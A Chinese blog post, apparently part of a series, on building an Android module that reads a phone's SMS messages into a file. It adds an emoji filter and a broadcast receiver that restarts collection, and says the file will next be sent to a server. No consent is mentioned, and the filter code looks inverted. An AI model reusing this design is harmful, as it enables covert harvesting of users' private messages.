前言
在安卓项目实战—-收集用户信息(一)中,已经实现了短信的读取并写入到文件的操作,这篇文章在此基础上增加广播短信操作的管理模块。
PS:临近考试,所以很久没有更新…bla bla bla…
遗留的BUG
在之前的短信操作类中,表面看没什么问题,在模拟器中完美运行,但是当把它放到真机测试时,就出现了写入文件失败,如图。
![image](/AP151227/illegalChar.jpg 非法字符报错)
经过查阅,发现是真机短信包含emoji表情导致的错误,emoji表情采用的是Unicode编码,在utf-8的xml解析中就会出现乱码(然而,笔者尝试将xml序列化的编码设置为Unicode并没有什么用,依旧报错)那么该如何解决这个问题呢?
经过不断百度、谷歌,终于在code.google.com问题页发现错误原因:谷歌的XmlSerializer忽略utf-16编码情况(笔者也没读懂到底是什么意思),总之是XmlSerializer不够完善,所以呢,有位大神重写了XmlSerializer,能够解决问题,不过这比较麻烦,所以我选择了其它方法————直接过滤掉emoji表情不就好了。
解决方法
过滤字符串中的Emoji表情[转]
http://www.oschina.net/question/89964_105220
很容易可以找到过滤emoji表情的java代码,笔者选择的是开源中国上一篇博客的代码,此处仅展示片段代码。
/**
* 过滤emoji 或者 其他非文字类型的字符
* @param source
* @return
*/
public static String filterEmoji(String source) {
if (!containsEmoji(source)) {
return source;//如果不包含,直接返回
}
//到这里铁定包含
StringBuilder buf = null;
int len = source.length();
for (int i = 0; i < len; i++) {
char codePoint = source.charAt(i);
if (isEmojiCharacter(codePoint)) {
if (buf == null) {
buf = new StringBuilder(source.length());
}
buf.append(codePoint);
} else {
}
}
if (buf == null) {
return source;//如果没有找到 emoji表情,则返回源字符串
} else {
if (buf.length() == len) {//这里的意义在于尽可能少的toString,因为会重新生成字符串
buf = null;
return source;
} else {
return buf.toString();
}
}
}
只需要在代码SmsOpt.java中调用过滤emoji表情的方法即可:
// sms.setBody(cursor.getString(3));
sms.setBody(EmojiFilter.filterEmoji(cursor.getString(3)));
完善bug
加了以上操作还是会有问题,大部分emoji能够过滤掉,但总是发现如果一段字符串只包含emoji或者非法字符,就不能过滤掉了,换句话说,存在不能过滤单个emoji的问题,笔者试了多种方法都没用,最后发现其实只要在方法中加上一句
source = " "+ source; //return 的时候trim()一下即可
就可以完美解决。
管理服务类
管理服务类无非就是管理SmsOpt的启动关闭的类,它需要继承广播接收者,实现我们自己定义的Collector接口,代码简单易懂,就不做解释了。
/**
* 短信采集服务
* Created by wuhaojie on 2015/11/9.
*/
public class SmsColt extends BroadcastReceiver implements Collector {
private static final String TAG = "SmsColt";
private Context mContext = null;
/**
* 短信操作对象
*/
private SmsOpt mSmsOpt = null;
public SmsColt() {
}
public SmsColt(Context mContext) {
this.mContext = mContext;
}
@Override
public void begin() {
Log.i(TAG, "开始短信采集服务");
if (mSmsOpt == null) {
mSmsOpt = new SmsOpt(mContext);
}
if (!mSmsOpt.isRunning())
mSmsOpt.start();
}
/**
* 广播接受者
*
* @param context
* @param intent
*/
@Override
public void onReceive(Context context, Intent intent) {
Log.i(TAG, "onReceive()");
this.mContext = context;
begin();
}
}
不仅如此,还需要一个MainServvice,用来管理所有的下级管理类。
/**
* 管理服务类
* Created by wuhaojie on 2015/11/9.
*/
public class MainService {
private Context mContext = null;
public MainService(Context mContext) {
this.mContext = mContext;
}
public void startAllService() {
SmsColt smsColt = new SmsColt(mContext);
smsColt.begin();
}
}
至此,可以在主界面中添加Button,用于开启所有服务
<Button
android:id="@+id/btn_main_start"
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:text="开启服务" />
至此,才算完成短信模块的全部内容,接下来就需要使用网络将文件发送到指定的服务器上去。